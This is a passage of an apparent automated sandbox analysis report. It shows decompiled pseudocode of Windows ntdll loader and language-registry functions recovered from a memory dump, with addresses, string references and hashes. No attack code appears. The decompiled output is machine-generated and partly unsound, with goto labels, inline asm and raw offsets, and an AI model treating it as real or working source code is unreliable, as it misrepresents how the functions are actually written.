												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E018A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1985c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1985c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E018DF380(_t136, 0x1871184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E018B2280(_t108, 0x19886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01969D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E018AFFB0(_t118, _t156, 0x19886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E018D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                0x018a8799
                0x018a879d
                0x018a87a1
                0x018a87a3
                0x018a87a8
                0x018a87c3
                0x018a87c3
                0x018a87c8
                0x018a87d1
                0x018a87d4
                0x018a87d8
                0x018a87e5
                0x018a87ec
                0x018f9bfe
                0x018f9c00
                0x018f9c02
                0x018f9c08
                0x018f9c0d
                0x018f9c0f
                0x018f9c14
                0x018f9c2d
                0x018f9c32
                0x018f9c37
                0x018f9c3a
                0x018f9c3c
                0x018f9c42
                0x018f9c42
                0x018f9c3c
                0x018f9c02
                0x018a87da
                0x018a87df
                0x018a87e3
                0x00000000
                0x00000000
                0x018a87e3
                0x018a87f2
                0x00000000
                0x018a87fb
                0x018a87fd
                0x018a87fe
                0x018a880e
                0x018a880f
                0x018a8810
                0x018a8814
                0x018a881a
                0x018a881c
                0x018a881f
                0x018a8821
                0x018a8822
                0x018a8824
                0x018a8826
                0x018a882c
                0x018a882e
                0x018f9c48
                0x018f9c48
                0x018a8834
                0x018a8834
                0x018a8837
                0x00000000
                0x00000000
                0x018a8837
                0x018a882e
                0x018a883d
                0x018a8840
                0x018a8843
                0x018a8846
                0x018a8849
                0x018a884c
                0x018a884e
                0x018a8850
                0x018a8852
                0x018a8854
                0x018a8857
                0x018a88b4
                0x018a88b6
                0x018a88b6
                0x018a8859
                0x018a8859
                0x018a8859
                0x018a8861
                0x018a8866
                0x018a886a
                0x018a893d
                0x018a8941
                0x00000000
                0x018a8947
                0x018a8947
                0x018a894a
                0x018a894c
                0x00000000
                0x018a8952
                0x018a8955
                0x018a895a
                0x018a895d
                0x018a895d
                0x018a895f
                0x018a8961
                0x018a8961
                0x018a8968
                0x00000000
                0x00000000
                0x018a896a
                0x018a896b
                0x018a896e
                0x00000000
                0x018a8970
                0x018a8970
                0x018a8970
                0x018a8970
                0x018a8972
                0x018a8972
                0x018a8974
                0x00000000
                0x018a897a
                0x018a897a
                0x018a897d
                0x00000000
                0x018a8983
                0x018f9c65
                0x018f9c6d
                0x018f9c72
                0x018f9c75
                0x018f9c75
                0x018f9c82
                0x018f9c86
                0x018f9c87
                0x018f9c88
                0x018f9c89
                0x018f9c8c
                0x018f9c90
                0x018f9c95
                0x018f9c97
                0x018f9ca0
                0x018f9ca3
                0x018f9ca9
                0x018f9ca9
                0x00000000
                0x018f9ca9
                0x018f9ca3
                0x00000000
                0x018f9c97
                0x018a897d
                0x00000000
                0x018a8974
                0x018a8988
                0x018a8992
                0x018a8996
                0x00000000
                0x018a8996
                0x018a894c
                0x00000000
                0x018a8870
                0x018a887b
                0x018a887d
                0x018a887f
                0x018a8881
                0x018a8884
                0x018a8884
                0x018a8886
                0x018a8889
                0x018a888c
                0x018a888e
                0x018a8891
                0x018a8891
                0x018a8898
                0x00000000
                0x00000000
                0x018a889a
                0x018a889b
                0x018a889e
                0x00000000
                0x00000000
                0x018a88a0
                0x018a88a8
                0x018a88b0
                0x018a88b2
                0x018a88d3
                0x018a88d5
                0x00000000
                0x018a88d7
                0x018a88db
                0x018a88dc
                0x018a88e0
                0x018a88e8
                0x018a88ee
                0x018a88f0
                0x018a88f3
                0x018a88fc
                0x018a8901
                0x018a8906
                0x018a890c
                0x018a890c
                0x018a890f
                0x018a8916
                0x018a8917
                0x018a8918
                0x018a8919
                0x018a891a
                0x018a891f
                0x018a8921
                0x018f9c52
                0x018f9c55
                0x018f9c5b
                0x018f9cac
                0x018f9cc0
                0x018f9cc0
                0x018f9c55
                0x018a8927
                0x018a8927
                0x018a892f
                0x018a8933
                0x00000000
                0x018a88f5
                0x018a88f5
                0x00000000
                0x018a88f7
                0x018a88f7
                0x018a88fa
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x018a88fa
                0x018a88f5
                0x018a88f3
                0x00000000
                0x018a88d5
                0x00000000
                0x018a88b2
                0x018a88c9
                0x00000000
                0x018a88c9
                0x018a887f
                0x018a886a
                0x018a8857
                0x018a8852
                0x018a88bf
                0x018a88bf
                0x018a87aa
                0x018a87ad
                0x018a87ae
                0x018a87b4
                0x018a87b5
                0x018a87b6
                0x018a87b8
                0x018a87bd
                0x018a87c1
                0x018a87f4
                0x018a87fa
                0x00000000
                0x00000000
                0x00000000
                0x018a87c1
                0x00000000

                Strings
                • minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28
                • LdrpDoPostSnapWork, xrefs: 018F9C1E
                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                • API String ID: 2994545307-1948996284
                • Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                • Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
                • Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                • Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018A7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E018A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E018ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0189C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1985780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01915510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1985780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E018B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01917016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E018B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01917016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E018CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0189B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                0x018a7e4c
                0x018a7e50
                0x018a7e55
                0x018a7e58
                0x018a7e5d
                0x018a7e71
                0x018a7f33
                0x018a7e77
                0x018a7e77
                0x018a7e79
                0x018a7e79
                0x018a7e7e
                0x018a7f45
                0x018f9848
                0x00000000
                0x018f9848
                0x018a7f4e
                0x018a7f53
                0x018a7f5a
                0x00000000
                0x00000000
                0x018f985a
                0x018f9862
                0x018f9866
                0x00000000
                0x018f986c
                0x00000000
                0x018f986c
                0x018a7e84
                0x018a7e84
                0x018a7e8d
                0x018f9871
                0x018a7eb8
                0x018a7ec0
                0x018a7ec0
                0x018a7e9a
                0x018f987e
                0x00000000
                0x00000000
                0x018f9884
                0x018f988b
                0x018f98a7
                0x018f98ac
                0x018f98b1
                0x018f98b6
                0x018f98b8
                0x018f98b8
                0x018f98b9
                0x00000000
                0x018f98b9
                0x018a7ea0
                0x018a7ea7
                0x00000000
                0x00000000
                0x018a7eac
                0x018a7eb1
                0x018a7ec6
                0x018a7ed0
                0x018f98cc
                0x018a7ed6
                0x018a7ed6
                0x018a7ed6
                0x018a7ede
                0x018a7ee3
                0x018f98e3
                0x018f98f0
                0x018f9902
                0x018f98f2
                0x018f98fb
                0x018f98fb
                0x018f9907
                0x018f991d
                0x018f991d
                0x018f9907
                0x018f98e3
                0x018a7ef0
                0x018a7f14
                0x018a7f14
                0x018a7f1e
                0x018f9946
                0x018a7f24
                0x018a7f24
                0x018a7f24
                0x018a7f2c
                0x018f996a
                0x018f9975
                0x018f9975
                0x018f997e
                0x018f9993
                0x018f9993
                0x018f997e
                0x00000000
                0x018a7ef2
                0x018a7efc
                0x018a7f0a
                0x018a7f0e
                0x018f9933
                0x00000000
                0x018f9933
                0x00000000
                0x018a7f0e
                0x00000000
                0x00000000
                0x00000000
                0x018a7eb1

                Strings
                • minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
                • LdrpCompleteMapModule, xrefs: 018F9898
                • Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                • API String ID: 0-1676968949
                • Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                • Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
                • Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                • Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0189E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0189E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0189F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018D95D0();
						}
						if(_t78 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E018DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E018DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E018D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E018DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0189F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E018DBB40(_t83, _t102 + 0x24, _t78);
								if(L018A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E018DBB40(_t84, _t102 + 0x24, _t94);
									if(L018A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                0x0189e620
                0x0189e628
                0x0189e62f
                0x0189e631
                0x0189e635
                0x0189e637
                0x0189e63e
                0x018f5503
                0x018f5503
                0x0189e64c
                0x0189e64c
                0x0189e651
                0x00000000
                0x00000000
                0x0189e661
                0x0189e665
                0x018f542a
                0x0189e715
                0x0189e71a
                0x0189e71c
                0x0189e720
                0x0189e720
                0x0189e727
                0x0189e736
                0x0189e736
                0x0189e743
                0x0189e743
                0x0189e673
                0x0189e678
                0x0189e67d
                0x0189e682
                0x0189e685
                0x0189e692
                0x0189e69b
                0x0189e6a3
                0x0189e6ad
                0x0189e6b1
                0x0189e6b2
                0x0189e6bb
                0x0189e6bf
                0x0189e6c0
                0x0189e6c8
                0x0189e6cc
                0x0189e6d5
                0x0189e6d9
                0x00000000
                0x00000000
                0x0189e6e5
                0x0189e6ea
                0x0189e6f9
                0x0189e70b
                0x0189e70f
                0x018f5439
                0x018f545e
                0x018f545e
                0x00000000
                0x018f545e
                0x018f543b
                0x018f543e
                0x018f5440
                0x018f5445
                0x018f5472
                0x018f5475
                0x018f548d
                0x018f5493
                0x018f54a9
                0x00000000
                0x00000000
                0x018f54ab
                0x018f54b4
                0x018f54bc
                0x018f54c8
                0x018f54de
                0x018f54fb
                0x018f54e0
                0x018f54e6
                0x018f54eb
                0x018f54eb
                0x018f54de
                0x00000000
                0x018f54bc
                0x018f5477
                0x018f547a
                0x018f5480
                0x018f5483
                0x018f5486
                0x018f548b
                0x00000000
                0x00000000
                0x00000000
                0x018f548b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x018f5447
                0x018f5447
                0x018f5447
                0x018f5447
                0x018f544e
                0x00000000
                0x00000000
                0x018f5450
                0x018f5452
                0x018f5455
                0x018f545a
                0x00000000
                0x00000000
                0x00000000
                0x018f545c
                0x018f546a
                0x018f546d
                0x018f546f
                0x00000000
                0x018f546f
                0x0189e70f

                Strings
                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
                • @, xrefs: 0189E6C0
                • InstallLanguageFallback, xrefs: 0189E6DB
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                • API String ID: 0-1757540487
                • Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                • Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
                • Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                • Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0195E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E0195E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0195BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0195BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0195AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E018D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0195A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0195A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0195A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0195A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E018B2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E018AB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E018AFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E018B7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0194FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                0x0195e547
                0x0195e549
                0x0195e54f
                0x0195e553
                0x0195e557
                0x0195e55a
                0x0195e55c
                0x0195e55f
                0x0195e561
                0x0195e567
                0x0195e56b
                0x0195e7e2
                0x00000000
                0x0195e571
                0x0195e575
                0x0195e577
                0x0195e57b
                0x0195e57c
                0x0195e57d
                0x0195e57e
                0x0195e57f
                0x0195e588
                0x0195e58f
                0x0195e591
                0x0195e592
                0x0195e592
                0x0195e596
                0x0195e59e
                0x0195e5a0
                0x0195e5a6
                0x0195e61d
                0x0195e61d
                0x0195e621
                0x0195e623
                0x0195e630
                0x0195e630
                0x0195e7e6
                0x0195e7eb
                0x0195e7ed
                0x0195e7f4
                0x0195e7fa
                0x0195e7ff
                0x0195e7ff
                0x0195e80a
                0x0195e812
                0x0195e812
                0x0195e5ab
                0x0195e5b4
                0x0195e5b9
                0x0195e5be
                0x0195e5c0
                0x0195e5c2
                0x0195e5c8
                0x0195e5c9
                0x0195e5cb
                0x0195e5cc
                0x0195e5d5
                0x0195e5e4
                0x0195e5f1
                0x0195e5f8
                0x0195e5f8
                0x0195e5d5
                0x0195e602
                0x0195e616
                0x0195e63d
                0x0195e644
                0x0195e64d
                0x0195e652
                0x0195e657
                0x0195e659
                0x0195e65b
                0x0195e661
                0x0195e662
                0x0195e664
                0x0195e665
                0x0195e66e
                0x0195e67d
                0x0195e68a
                0x0195e691
                0x0195e691
                0x0195e66e
                0x0195e6b0
                0x00000000
                0x0195e6b6
                0x0195e6bd
                0x0195e6c7
                0x0195e6d7
                0x0195e6d9
                0x0195e6db
                0x0195e6de
                0x0195e6e3
                0x0195e6f3
                0x0195e6fc
                0x0195e700
                0x0195e700
                0x0195e704
                0x0195e70a
                0x0195e70a
                0x0195e713
                0x0195e716
                0x0195e719
                0x0195e720
                0x0195e761
                0x0195e76b
                0x0195e774
                0x0195e77a
                0x0195e77a
                0x0195e78a
                0x0195e791
                0x0195e799
                0x0195e79b
                0x0195e79f
                0x0195e7aa
                0x0195e7c0
                0x0195e7ac
                0x0195e7b2
                0x0195e7b9
                0x0195e7b9
                0x0195e7c7
                0x0195e806
                0x00000000
                0x0195e7c9
                0x0195e7d1
                0x0195e7d8
                0x00000000
                0x0195e7d8
                0x00000000
                0x00000000
                0x0195e722
                0x0195e72e
                0x0195e748
                0x0195e74c
                0x0195e754
                0x0195e756
                0x0195e75c
                0x0195e75c
                0x00000000
                0x0195e75c
                0x0195e758
                0x0195e758
                0x00000000
                0x0195e758
                0x0195e750
                0x00000000
                0x00000000
                0x0195e752
                0x00000000
                0x0195e752
                0x0195e730
                0x0195e735
                0x0195e73d
                0x0195e73f
                0x00000000
                0x00000000
                0x0195e741
                0x0195e741
                0x00000000
                0x0195e741
                0x0195e739
                0x00000000
                0x00000000
                0x0195e73b
                0x00000000
                0x0195e73b
                0x0195e722
                0x0195e720
                0x0195e6b0
                0x0195e618
                0x00000000
                0x0195e618

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
